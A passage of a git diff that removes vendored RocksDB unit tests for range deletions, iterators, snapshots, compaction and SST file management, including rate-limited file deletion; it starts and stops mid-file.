-  opts.memtable_factory.reset(new SpecialSkipListFactory(kNumPerFile));
-  Reopen(opts);
-
-  // Write half of the keys before the tombstone and half after the tombstone.
-  // Only covered keys (i.e., within the range and older than the tombstone)
-  // should be deleted.
-  for (int i = 0; i < kNum; ++i) {
-    if (i == kNum / 2) {
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                       GetNumericStr(kRangeBegin), GetNumericStr(kRangeEnd));
-    }
-    db_->Put(WriteOptions(), GetNumericStr(i), "val");
-  }
-  ReadOptions read_opts;
-  auto* iter = db_->NewIterator(read_opts);
-
-  int expected = 0;
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ASSERT_EQ(GetNumericStr(expected), iter->key());
-    if (expected == kRangeBegin - 1) {
-      expected = kNum / 2;
-    } else {
-      ++expected;
-    }
-  }
-  ASSERT_EQ(kNum, expected);
-  delete iter;
-}
-
-TEST_F(DBRangeDelTest, IteratorOverUserSnapshot) {
-  const int kNum = 200, kRangeBegin = 50, kRangeEnd = 150, kNumPerFile = 25;
-  Options opts = CurrentOptions();
-  opts.comparator = test::Uint64Comparator();
-  opts.memtable_factory.reset(new SpecialSkipListFactory(kNumPerFile));
-  Reopen(opts);
-
-  const Snapshot* snapshot = nullptr;
-  // Put a snapshot before the range tombstone, verify an iterator using that
-  // snapshot sees all inserted keys.
-  for (int i = 0; i < kNum; ++i) {
-    if (i == kNum / 2) {
-      snapshot = db_->GetSnapshot();
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                       GetNumericStr(kRangeBegin), GetNumericStr(kRangeEnd));
-    }
-    db_->Put(WriteOptions(), GetNumericStr(i), "val");
-  }
-  ReadOptions read_opts;
-  read_opts.snapshot = snapshot;
-  auto* iter = db_->NewIterator(read_opts);
-
-  int expected = 0;
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ASSERT_EQ(GetNumericStr(expected), iter->key());
-    ++expected;
-  }
-  ASSERT_EQ(kNum / 2, expected);
-  delete iter;
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, IteratorIgnoresRangeDeletions) {
-  Options opts = CurrentOptions();
-  opts.max_write_buffer_number = 4;
-  opts.min_write_buffer_number_to_merge = 3;
-  opts.memtable_factory.reset(new SpecialSkipListFactory(1));
-  Reopen(opts);
-
-  db_->Put(WriteOptions(), "sst_key", "val");
-  // snapshot prevents key from being deleted during flush
-  const Snapshot* snapshot = db_->GetSnapshot();
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  db_->Put(WriteOptions(), "imm_key", "val");
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-  db_->Put(WriteOptions(), "mem_key", "val");
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-
-  ReadOptions read_opts;
-  read_opts.ignore_range_deletions = true;
-  auto* iter = db_->NewIterator(read_opts);
-  int i = 0;
-  std::string expected[] = {"imm_key", "mem_key", "sst_key"};
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next(), ++i) {
-    std::string key;
-    ASSERT_EQ(expected[i], iter->key());
-  }
-  ASSERT_EQ(3, i);
-  delete iter;
-  db_->ReleaseSnapshot(snapshot);
-}
-
-#ifndef ROCKSDB_UBSAN_RUN
-TEST_F(DBRangeDelTest, TailingIteratorRangeTombstoneUnsupported) {
-  db_->Put(WriteOptions(), "key", "val");
-  // snapshot prevents key from being deleted during flush
-  const Snapshot* snapshot = db_->GetSnapshot();
-  ASSERT_OK(
-      db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), "a", "z"));
-
-  // iterations check unsupported in memtable, l0, and then l1
-  for (int i = 0; i < 3; ++i) {
-    ReadOptions read_opts;
-    read_opts.tailing = true;
-    auto* iter = db_->NewIterator(read_opts);
-    if (i == 2) {
-      // For L1+, iterators over files are created on-demand, so need seek
-      iter->SeekToFirst();
-    }
-    ASSERT_TRUE(iter->status().IsNotSupported());
-    delete iter;
-    if (i == 0) {
-      ASSERT_OK(db_->Flush(FlushOptions()));
-    } else if (i == 1) {
-      MoveFilesToLevel(1);
-    }
-  }
-  db_->ReleaseSnapshot(snapshot);
-}
-
-#endif  // !ROCKSDB_UBSAN_RUN
-
-TEST_F(DBRangeDelTest, SubcompactionHasEmptyDedicatedRangeDelFile) {
-  const int kNumFiles = 2, kNumKeysPerFile = 4;
-  Options options = CurrentOptions();
-  options.compression = kNoCompression;
-  options.disable_auto_compactions = true;
-  options.level0_file_num_compaction_trigger = kNumFiles;
-  options.max_subcompactions = 2;
-  options.num_levels = 2;
-  options.target_file_size_base = 4096;
-  Reopen(options);
-
-  // need a L1 file for subcompaction to be triggered
-  ASSERT_OK(
-      db_->Put(WriteOptions(), db_->DefaultColumnFamily(), Key(0), "val"));
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  MoveFilesToLevel(1);
-
-  // put enough keys to fill up the first subcompaction, and later range-delete
-  // them so that the first subcompaction outputs no key-values. In that case
-  // it'll consider making an SST file dedicated to range deletions.
-  for (int i = 0; i < kNumKeysPerFile; ++i) {
-    ASSERT_OK(db_->Put(WriteOptions(), db_->DefaultColumnFamily(), Key(i),
-                       std::string(1024, 'a')));
-  }
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  ASSERT_OK(db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), Key(0),
-                             Key(kNumKeysPerFile)));
-
-  // the above range tombstone can be dropped, so that one alone won't cause a
-  // dedicated file to be opened. We can make one protected by snapshot that
-  // must be considered. Make its range outside the first subcompaction's range
-  // to exercise the tricky part of the code.
-  const Snapshot* snapshot = db_->GetSnapshot();
-  ASSERT_OK(db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                             Key(kNumKeysPerFile + 1),
-                             Key(kNumKeysPerFile + 2)));
-  ASSERT_OK(db_->Flush(FlushOptions()));
-
-  ASSERT_EQ(kNumFiles, NumTableFilesAtLevel(0));
-  ASSERT_EQ(1, NumTableFilesAtLevel(1));
-
-  db_->EnableAutoCompaction({db_->DefaultColumnFamily()});
-  dbfull()->TEST_WaitForCompact();
-  db_->ReleaseSnapshot(snapshot);
-}
-
-TEST_F(DBRangeDelTest, MemtableBloomFilter) {
-  // regression test for #2743. the range delete tombstones in memtable should
-  // be added even when Get() skips searching due to its prefix bloom filter
-  const int kMemtableSize = 1 << 20;              // 1MB
-  const int kMemtablePrefixFilterSize = 1 << 13;  // 8KB
-  const int kNumKeys = 1000;
-  const int kPrefixLen = 8;
-  Options options = CurrentOptions();
-  options.memtable_prefix_bloom_size_ratio =
-      static_cast<double>(kMemtablePrefixFilterSize) / kMemtableSize;
-  options.prefix_extractor.reset(rocksdb::NewFixedPrefixTransform(kPrefixLen));
-  options.write_buffer_size = kMemtableSize;
-  Reopen(options);
-
-  for (int i = 0; i < kNumKeys; ++i) {
-    ASSERT_OK(Put(Key(i), "val"));
-  }
-  Flush();
-  ASSERT_OK(db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), Key(0),
-                             Key(kNumKeys)));
-  for (int i = 0; i < kNumKeys; ++i) {
-    std::string value;
-    ASSERT_TRUE(db_->Get(ReadOptions(), Key(i), &value).IsNotFound());
-  }
-}
-
-TEST_F(DBRangeDelTest, CompactionTreatsSplitInputLevelDeletionAtomically) {
-  // make sure compaction treats files containing a split range deletion in the
-  // input level as an atomic unit. I.e., compacting any input-level file(s)
-  // containing a portion of the range deletion causes all other input-level
-  // files containing portions of that same range deletion to be included in the
-  // compaction.
-  const int kNumFilesPerLevel = 4, kValueBytes = 4 << 10;
-  Options options = CurrentOptions();
-  options.compression = kNoCompression;
-  options.level0_file_num_compaction_trigger = kNumFilesPerLevel;
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(2 /* num_entries_flush */));
-  options.target_file_size_base = kValueBytes;
-  // i == 0: CompactFiles
-  // i == 1: CompactRange
-  // i == 2: automatic compaction
-  for (int i = 0; i < 3; ++i) {
-    DestroyAndReopen(options);
-
-    ASSERT_OK(Put(Key(0), ""));
-    ASSERT_OK(db_->Flush(FlushOptions()));
-    MoveFilesToLevel(2);
-    ASSERT_EQ(1, NumTableFilesAtLevel(2));
-
-    // snapshot protects range tombstone from dropping due to becoming obsolete.
-    const Snapshot* snapshot = db_->GetSnapshot();
-    db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), Key(0),
-                     Key(2 * kNumFilesPerLevel));
-
-    Random rnd(301);
-    std::string value = RandomString(&rnd, kValueBytes);
-    for (int j = 0; j < kNumFilesPerLevel; ++j) {
-      // give files overlapping key-ranges to prevent trivial move
-      ASSERT_OK(Put(Key(j), value));
-      ASSERT_OK(Put(Key(2 * kNumFilesPerLevel - 1 - j), value));
-      if (j > 0) {
-        dbfull()->TEST_WaitForFlushMemTable();
-        ASSERT_EQ(j, NumTableFilesAtLevel(0));
-      }
-    }
-    // put extra key to trigger final flush
-    ASSERT_OK(Put("", ""));
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-    ASSERT_EQ(0, NumTableFilesAtLevel(0));
-    ASSERT_EQ(kNumFilesPerLevel, NumTableFilesAtLevel(1));
-
-    ColumnFamilyMetaData meta;
-    db_->GetColumnFamilyMetaData(&meta);
-    if (i == 0) {
-      ASSERT_OK(db_->CompactFiles(
-          CompactionOptions(), {meta.levels[1].files[0].name}, 2 /* level */));
-    } else if (i == 1) {
-      auto begin_str = Key(0), end_str = Key(1);
-      Slice begin = begin_str, end = end_str;
-      ASSERT_OK(db_->CompactRange(CompactRangeOptions(), &begin, &end));
-    } else if (i == 2) {
-      ASSERT_OK(db_->SetOptions(db_->DefaultColumnFamily(),
-                                {{"max_bytes_for_level_base", "10000"}}));
-      dbfull()->TEST_WaitForCompact();
-    }
-    ASSERT_EQ(0, NumTableFilesAtLevel(1));
-    ASSERT_GT(NumTableFilesAtLevel(2), 0);
-
-    db_->ReleaseSnapshot(snapshot);
-  }
-}
-
-TEST_F(DBRangeDelTest, UnorderedTombstones) {
-  // Regression test for #2752. Range delete tombstones between
-  // different snapshot stripes are not stored in order, so the first
-  // tombstone of each snapshot stripe should be checked as a smallest
-  // candidate.
-  Options options = CurrentOptions();
-  DestroyAndReopen(options);
-
-  auto cf = db_->DefaultColumnFamily();
-
-  ASSERT_OK(db_->Put(WriteOptions(), cf, "a", "a"));
-  ASSERT_OK(db_->Flush(FlushOptions(), cf));
-  ASSERT_EQ(1, NumTableFilesAtLevel(0));
-  ASSERT_OK(dbfull()->TEST_CompactRange(0, nullptr, nullptr));
-  ASSERT_EQ(1, NumTableFilesAtLevel(1));
-
-  ASSERT_OK(db_->DeleteRange(WriteOptions(), cf, "b", "c"));
-  // Hold a snapshot to separate these two delete ranges.
-  auto snapshot = db_->GetSnapshot();
-  ASSERT_OK(db_->DeleteRange(WriteOptions(), cf, "a", "b"));
-  ASSERT_OK(db_->Flush(FlushOptions(), cf));
-  db_->ReleaseSnapshot(snapshot);
-
-  std::vector<std::vector<FileMetaData>> files;
-  dbfull()->TEST_GetFilesMetaData(cf, &files);
-  ASSERT_EQ(1, files[0].size());
-  ASSERT_EQ("a", files[0][0].smallest.user_key());
-  ASSERT_EQ("c", files[0][0].largest.user_key());
-
-  std::string v;
-  auto s = db_->Get(ReadOptions(), "a", &v);
-  ASSERT_TRUE(s.IsNotFound());
-}
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_sst_test.cc b/thirdparty/rocksdb/db/db_sst_test.cc
deleted file mode 100644
index e01754c..0000000
--- a/thirdparty/rocksdb/db/db_sst_test.cc
+++ /dev/null
@@ -1,849 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_test_util.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/sst_file_manager.h"
-#include "util/sst_file_manager_impl.h"
-
-namespace rocksdb {
-
-class DBSSTTest : public DBTestBase {
- public:
-  DBSSTTest() : DBTestBase("/db_sst_test") {}
-};
-
-TEST_F(DBSSTTest, DontDeletePendingOutputs) {
-  Options options;
-  options.env = env_;
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-
-  // Every time we write to a table file, call FOF/POF with full DB scan. This
-  // will make sure our pending_outputs_ protection work correctly
-  std::function<void()> purge_obsolete_files_function = [&]() {
-    JobContext job_context(0);
-    dbfull()->TEST_LockMutex();
-    dbfull()->FindObsoleteFiles(&job_context, true /*force*/);
-    dbfull()->TEST_UnlockMutex();
-    dbfull()->PurgeObsoleteFiles(job_context);
-    job_context.Clean();
-  };
-
-  env_->table_write_callback_ = &purge_obsolete_files_function;
-
-  for (int i = 0; i < 2; ++i) {
-    ASSERT_OK(Put("a", "begin"));
-    ASSERT_OK(Put("z", "end"));
-    ASSERT_OK(Flush());
-  }
-
-  // If pending output guard does not work correctly, PurgeObsoleteFiles() will
-  // delete the file that Compaction is trying to create, causing this: error
-  // db/db_test.cc:975: IO error:
-  // /tmp/rocksdbtest-1552237650/db_test/000009.sst: No such file or directory
-  Compact("a", "b");
-}
-
-// 1 Create some SST files by inserting K-V pairs into DB
-// 2 Close DB and change suffix from ".sst" to ".ldb" for every other SST file
-// 3 Open DB and check if all key can be read
-TEST_F(DBSSTTest, SSTsWithLdbSuffixHandling) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.num_levels = 4;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  int key_id = 0;
-  for (int i = 0; i < 10; ++i) {
-    GenerateNewFile(&rnd, &key_id, false);
-  }
-  Flush();
-  Close();
-  int const num_files = GetSstFileCount(dbname_);
-  ASSERT_GT(num_files, 0);
-
-  std::vector<std::string> filenames;
-  GetSstFiles(dbname_, &filenames);
-  int num_ldb_files = 0;
-  for (size_t i = 0; i < filenames.size(); ++i) {
-    if (i & 1) {
-      continue;
-    }
-    std::string const rdb_name = dbname_ + "/" + filenames[i];
-    std::string const ldb_name = Rocks2LevelTableFileName(rdb_name);
-    ASSERT_TRUE(env_->RenameFile(rdb_name, ldb_name).ok());
-    ++num_ldb_files;
-  }
-  ASSERT_GT(num_ldb_files, 0);
-  ASSERT_EQ(num_files, GetSstFileCount(dbname_));
-
-  Reopen(options);
-  for (int k = 0; k < key_id; ++k) {
-    ASSERT_NE("NOT_FOUND", Get(Key(k)));
-  }
-  Destroy(options);
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBSSTTest, DontDeleteMovedFile) {
-  // This test triggers move compaction and verifies that the file is not
-  // deleted when it's part of move compaction
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.max_bytes_for_level_base = 1024 * 1024;  // 1 MB
-  options.level0_file_num_compaction_trigger =
-      2;  // trigger compaction when we have 2 files
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  // Create two 1MB sst files
-  for (int i = 0; i < 2; ++i) {
-    // Create 1MB sst file
-    for (int j = 0; j < 100; ++j) {
-      ASSERT_OK(Put(Key(i * 50 + j), RandomString(&rnd, 10 * 1024)));
-    }
-    ASSERT_OK(Flush());
-  }
-  // this should execute both L0->L1 and L1->(move)->L2 compactions
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ("0,0,1", FilesPerLevel(0));
-
-  // If the moved file is actually deleted (the move-safeguard in
-  // ~Version::Version() is not there), we get this failure:
-  // Corruption: Can't access /000009.sst
-  Reopen(options);
-}
-
-// This reproduces a bug where we don't delete a file because when it was
-// supposed to be deleted, it was blocked by pending_outputs
-// Consider:
-// 1. current file_number is 13
-// 2. compaction (1) starts, blocks deletion of all files starting with 13
-// (pending outputs)
-// 3. file 13 is created by compaction (2)
-// 4. file 13 is consumed by compaction (3) and file 15 was created. Since file
-// 13 has no references, it is put into VersionSet::obsolete_files_
-// 5. FindObsoleteFiles() gets file 13 from VersionSet::obsolete_files_. File 13
-// is deleted from obsolete_files_ set.
-// 6. PurgeObsoleteFiles() tries to delete file 13, but this file is blocked by
-// pending outputs since compaction (1) is still running. It is not deleted and
-// it is not present in obsolete_files_ anymore. Therefore, we never delete it.
-TEST_F(DBSSTTest, DeleteObsoleteFilesPendingOutputs) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.write_buffer_size = 2 * 1024 * 1024;     // 2 MB
-  options.max_bytes_for_level_base = 1024 * 1024;  // 1 MB
-  options.level0_file_num_compaction_trigger =
-      2;  // trigger compaction when we have 2 files
-  options.max_background_flushes = 2;
-  options.max_background_compactions = 2;
-
-  OnFileDeletionListener* listener = new OnFileDeletionListener();
-  options.listeners.emplace_back(listener);
-
-  Reopen(options);
-
-  Random rnd(301);
-  // Create two 1MB sst files
-  for (int i = 0; i < 2; ++i) {
-    // Create 1MB sst file
-    for (int j = 0; j < 100; ++j) {
-      ASSERT_OK(Put(Key(i * 50 + j), RandomString(&rnd, 10 * 1024)));
-    }
-    ASSERT_OK(Flush());
-  }
-  // this should execute both L0->L1 and L1->(move)->L2 compactions
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ("0,0,1", FilesPerLevel(0));
-
-  test::SleepingBackgroundTask blocking_thread;
-  port::Mutex mutex_;
-  bool already_blocked(false);
-
-  // block the flush
-  std::function<void()> block_first_time = [&]() {
-    bool blocking = false;
-    {
-      MutexLock l(&mutex_);
-      if (!already_blocked) {
-        blocking = true;
-        already_blocked = true;
-      }
-    }
-    if (blocking) {
-      blocking_thread.DoSleep();
-    }
-  };
-  env_->table_write_callback_ = &block_first_time;
-  // Insert 2.5MB data, which should trigger a flush because we exceed
-  // write_buffer_size. The flush will be blocked with block_first_time
-  // pending_file is protecting all the files created after
-  for (int j = 0; j < 256; ++j) {
-    ASSERT_OK(Put(Key(j), RandomString(&rnd, 10 * 1024)));
-  }
-  blocking_thread.WaitUntilSleeping();
-
-  ASSERT_OK(dbfull()->TEST_CompactRange(2, nullptr, nullptr));
-
-  ASSERT_EQ("0,0,0,1", FilesPerLevel(0));
-  std::vector<LiveFileMetaData> metadata;
-  db_->GetLiveFilesMetaData(&metadata);
-  ASSERT_EQ(metadata.size(), 1U);
-  auto file_on_L2 = metadata[0].name;
-  listener->SetExpectedFileName(dbname_ + file_on_L2);
-
-  ASSERT_OK(dbfull()->TEST_CompactRange(3, nullptr, nullptr, nullptr,
-                                        true /* disallow trivial move */));
-  ASSERT_EQ("0,0,0,0,1", FilesPerLevel(0));
-
-  // finish the flush!
-  blocking_thread.WakeUp();
-  blocking_thread.WaitUntilDone();
-  dbfull()->TEST_WaitForFlushMemTable();
-  // File just flushed is too big for L0 and L1 so gets moved to L2.
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ("0,0,1,0,1", FilesPerLevel(0));
-
-  metadata.clear();
-  db_->GetLiveFilesMetaData(&metadata);
-  ASSERT_EQ(metadata.size(), 2U);
-
-  // This file should have been deleted during last compaction
-  ASSERT_EQ(Status::NotFound(), env_->FileExists(dbname_ + file_on_L2));
-  listener->VerifyMatchedCount(1);
-}
-
-TEST_F(DBSSTTest, DBWithSstFileManager) {
-  std::shared_ptr<SstFileManager> sst_file_manager(NewSstFileManager(env_));
-  auto sfm = static_cast<SstFileManagerImpl*>(sst_file_manager.get());
-
-  int files_added = 0;
-  int files_deleted = 0;
-  int files_moved = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SstFileManagerImpl::OnAddFile", [&](void* arg) { files_added++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SstFileManagerImpl::OnDeleteFile", [&](void* arg) { files_deleted++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SstFileManagerImpl::OnMoveFile", [&](void* arg) { files_moved++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.sst_file_manager = sst_file_manager;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  for (int i = 0; i < 25; i++) {
-    GenerateNewRandomFile(&rnd);
-    ASSERT_OK(Flush());
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-    // Verify that we are tracking all sst files in dbname_
-    ASSERT_EQ(sfm->GetTrackedFiles(), GetAllSSTFiles());
-  }
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-  auto files_in_db = GetAllSSTFiles();
-  // Verify that we are tracking all sst files in dbname_
-  ASSERT_EQ(sfm->GetTrackedFiles(), files_in_db);
-  // Verify the total files size
-  uint64_t total_files_size = 0;
-  for (auto& file_to_size : files_in_db) {
-    total_files_size += file_to_size.second;
-  }
-  ASSERT_EQ(sfm->GetTotalSize(), total_files_size);
-  // We flushed at least 25 files
-  ASSERT_GE(files_added, 25);
-  // Compaction must have deleted some files
-  ASSERT_GT(files_deleted, 0);
-  // No files were moved
-  ASSERT_EQ(files_moved, 0);
-
-  Close();
-  Reopen(options);
-  ASSERT_EQ(sfm->GetTrackedFiles(), files_in_db);
-  ASSERT_EQ(sfm->GetTotalSize(), total_files_size);
-
-  // Verify that we track all the files again after the DB is closed and opened
-  Close();
-  sst_file_manager.reset(NewSstFileManager(env_));
-  options.sst_file_manager = sst_file_manager;
-  sfm = static_cast<SstFileManagerImpl*>(sst_file_manager.get());
-
-  Reopen(options);
-  ASSERT_EQ(sfm->GetTrackedFiles(), files_in_db);
-  ASSERT_EQ(sfm->GetTotalSize(), total_files_size);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBSSTTest, RateLimitedDelete) {
-  Destroy(last_options_);
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DBSSTTest::RateLimitedDelete:1",
-       "DeleteScheduler::BackgroundEmptyTrash"},
-  });
-
-  std::vector<uint64_t> penalties;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::BackgroundEmptyTrash:Wait",
-      [&](void* arg) { penalties.push_back(*(static_cast<uint64_t*>(arg))); });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "InstrumentedCondVar::TimedWaitInternal", [&](void* arg) {
-        // Turn timed wait into a simulated sleep
-        uint64_t* abs_time_us = static_cast<uint64_t*>(arg);
-        int64_t cur_time = 0;
-        env_->GetCurrentTime(&cur_time);
-        if (*abs_time_us > static_cast<uint64_t>(cur_time)) {
-          env_->addon_time_.fetch_add(*abs_time_us -
-                                      static_cast<uint64_t>(cur_time));
-        }
-
-        // Randomly sleep shortly
-        env_->addon_time_.fetch_add(
-            static_cast<uint64_t>(Random::GetTLSInstance()->Uniform(10)));
-
-        // Set wait until time to before current to force not to sleep.
-        int64_t real_cur_time = 0;
-        Env::Default()->GetCurrentTime(&real_cur_time);
-        *abs_time_us = static_cast<uint64_t>(real_cur_time);
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  env_->no_slowdown_ = true;
-  env_->time_elapse_only_sleep_ = true;
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.env = env_;
-
-  std::string trash_dir = test::TmpDir(env_) + "/trash";
-  int64_t rate_bytes_per_sec = 1024 * 10;  // 10 Kbs / Sec
-  Status s;
-  options.sst_file_manager.reset(
-      NewSstFileManager(env_, nullptr, trash_dir, 0, false, &s));
-  ASSERT_OK(s);
-  options.sst_file_manager->SetDeleteRateBytesPerSecond(rate_bytes_per_sec);
-  auto sfm = static_cast<SstFileManagerImpl*>(options.sst_file_manager.get());
-  sfm->delete_scheduler()->TEST_SetMaxTrashDBRatio(1.1);
-
-  ASSERT_OK(TryReopen(options));
-  // Create 4 files in L0
-  for (char v = 'a'; v <= 'd'; v++) {
-    ASSERT_OK(Put("Key2", DummyString(1024, v)));
-    ASSERT_OK(Put("Key3", DummyString(1024, v)));
-    ASSERT_OK(Put("Key4", DummyString(1024, v)));
-    ASSERT_OK(Put("Key1", DummyString(1024, v)));
-    ASSERT_OK(Put("Key4", DummyString(1024, v)));
-    ASSERT_OK(Flush());
-  }
-  // We created 4 sst files in L0
-  ASSERT_EQ("4", FilesPerLevel(0));
-
-  std::vector<LiveFileMetaData> metadata;
-  db_->GetLiveFilesMetaData(&metadata);
-
-  // Compaction will move the 4 files in L0 to trash and create 1 L1 file
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ("0,1", FilesPerLevel(0));
-
-  uint64_t delete_start_time = env_->NowMicros();
-  // Hold BackgroundEmptyTrash
-  TEST_SYNC_POINT("DBSSTTest::RateLimitedDelete:1");
-  sfm->WaitForEmptyTrash();
-  uint64_t time_spent_deleting = env_->NowMicros() - delete_start_time;
-
-  uint64_t total_files_size = 0;
-  uint64_t expected_penlty = 0;
-  ASSERT_EQ(penalties.size(), metadata.size());
-  for (size_t i = 0; i < metadata.size(); i++) {
-    total_files_size += metadata[i].size;
-    expected_penlty = ((total_files_size * 1000000) / rate_bytes_per_sec);
-    ASSERT_EQ(expected_penlty, penalties[i]);
-  }
-  ASSERT_GT(time_spent_deleting, expected_penlty * 0.9);
-  ASSERT_LT(time_spent_deleting, expected_penlty * 1.1);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-// Create a DB with 2 db_paths, and generate multiple files in the 2
-// db_paths using CompactRangeOptions, make sure that files that were
-// deleted from first db_path were deleted using DeleteScheduler and
-// files in the second path were not.
-TEST_F(DBSSTTest, DeleteSchedulerMultipleDBPaths) {
-  int bg_delete_file = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.db_paths.emplace_back(dbname_, 1024 * 100);
-  options.db_paths.emplace_back(dbname_ + "_2", 1024 * 100);
-  options.env = env_;
-
-  std::string trash_dir = test::TmpDir(env_) + "/trash";
-  int64_t rate_bytes_per_sec = 1024 * 1024;  // 1 Mb / Sec
-  Status s;
-  options.sst_file_manager.reset(NewSstFileManager(
-      env_, nullptr, trash_dir, rate_bytes_per_sec, false, &s));
-  ASSERT_OK(s);
-  auto sfm = static_cast<SstFileManagerImpl*>(options.sst_file_manager.get());
-  sfm->delete_scheduler()->TEST_SetMaxTrashDBRatio(1.1);
-
-  DestroyAndReopen(options);
-
-  // Create 4 files in L0
-  for (int i = 0; i < 4; i++) {
-    ASSERT_OK(Put("Key" + ToString(i), DummyString(1024, 'A')));
-    ASSERT_OK(Flush());
-  }
-  // We created 4 sst files in L0
-  ASSERT_EQ("4", FilesPerLevel(0));
-  // Compaction will delete files from L0 in first db path and generate a new
-  // file in L1 in second db path
-  CompactRangeOptions compact_options;
-  compact_options.target_path_id = 1;
-  Slice begin("Key0");
-  Slice end("Key3");
-  ASSERT_OK(db_->CompactRange(compact_options, &begin, &end));
-  ASSERT_EQ("0,1", FilesPerLevel(0));
-
-  // Create 4 files in L0
-  for (int i = 4; i < 8; i++) {
-    ASSERT_OK(Put("Key" + ToString(i), DummyString(1024, 'B')));
-    ASSERT_OK(Flush());
-  }
-  ASSERT_EQ("4,1", FilesPerLevel(0));
-
-  // Compaction will delete files from L0 in first db path and generate a new
-  // file in L1 in second db path
-  begin = "Key4";
-  end = "Key7";
-  ASSERT_OK(db_->CompactRange(compact_options, &begin, &end));
-  ASSERT_EQ("0,2", FilesPerLevel(0));
-
-  sfm->WaitForEmptyTrash();
-  ASSERT_EQ(bg_delete_file, 8);
-
-  compact_options.bottommost_level_compaction =
-      BottommostLevelCompaction::kForce;
-  ASSERT_OK(db_->CompactRange(compact_options, nullptr, nullptr));
-  ASSERT_EQ("0,1", FilesPerLevel(0));
-
-  sfm->WaitForEmptyTrash();
-  ASSERT_EQ(bg_delete_file, 8);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DBSSTTest, DestroyDBWithRateLimitedDelete) {
-  int bg_delete_file = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Status s;
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.env = env_;
-  std::string trash_dir = test::TmpDir(env_) + "/trash";
-  options.sst_file_manager.reset(
-      NewSstFileManager(env_, nullptr, trash_dir, 0, false, &s));
-  ASSERT_OK(s);
-  DestroyAndReopen(options);
-
-  // Create 4 files in L0
-  for (int i = 0; i < 4; i++) {
-    ASSERT_OK(Put("Key" + ToString(i), DummyString(1024, 'A')));
-    ASSERT_OK(Flush());
-  }
-  // We created 4 sst files in L0
-  ASSERT_EQ("4", FilesPerLevel(0));
-
-  // Close DB and destroy it using DeleteScheduler
-  Close();
-
-  auto sfm = static_cast<SstFileManagerImpl*>(options.sst_file_manager.get());
-
-  sfm->SetDeleteRateBytesPerSecond(1024 * 1024);
